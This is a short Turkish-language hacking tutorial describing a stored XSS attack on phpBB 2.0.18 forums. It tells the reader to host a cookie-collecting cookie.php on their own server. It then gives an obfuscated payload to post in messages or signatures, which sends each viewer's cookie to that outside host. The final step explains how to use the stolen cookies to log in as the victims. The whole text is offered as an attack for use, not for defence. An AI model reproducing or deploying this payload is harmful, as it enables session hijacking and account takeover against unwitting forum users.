Amac: Sitehack
Yöntem: XSS
Merhaba,
Sizlere son sürüm phpbb 2.0.18 acigini anlatiyorum.
------------------------------------------------------
1. Asama:
Bu Kodlari kayit edip Serverinize Upload ediyorsunuz.
- Örnek: cookie.php
- CHMOD: 777
Sor:
<php>
------------------------------------------------------
2. Asama:
Bu Kodlari son sürüm phpBB 2.0.18 Versiyonunda normal Mesaj yazarak koyuyorsunuz. Adres olarak Cookie.php'yi Upload ettiginiz yeri belirtin.
Imzalardada calisiyor!
Sor:
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval
(this.sss));'sss=`i=new/**/Image();i.src='http://www.siteadi.com/cookie.php?
c='+****************;this.sss=null`style='font-size:0; X="<B ">'
------------------------------------------------------
3. Asama:
Sizin yazdiginiz Mesaji görüntüleyen Kisilerin Cookie Bilgileri size gelecek ve sizde bunlari editleyip o Kisinin Adina Login yapabilirsiniz.
Kolay gelsin..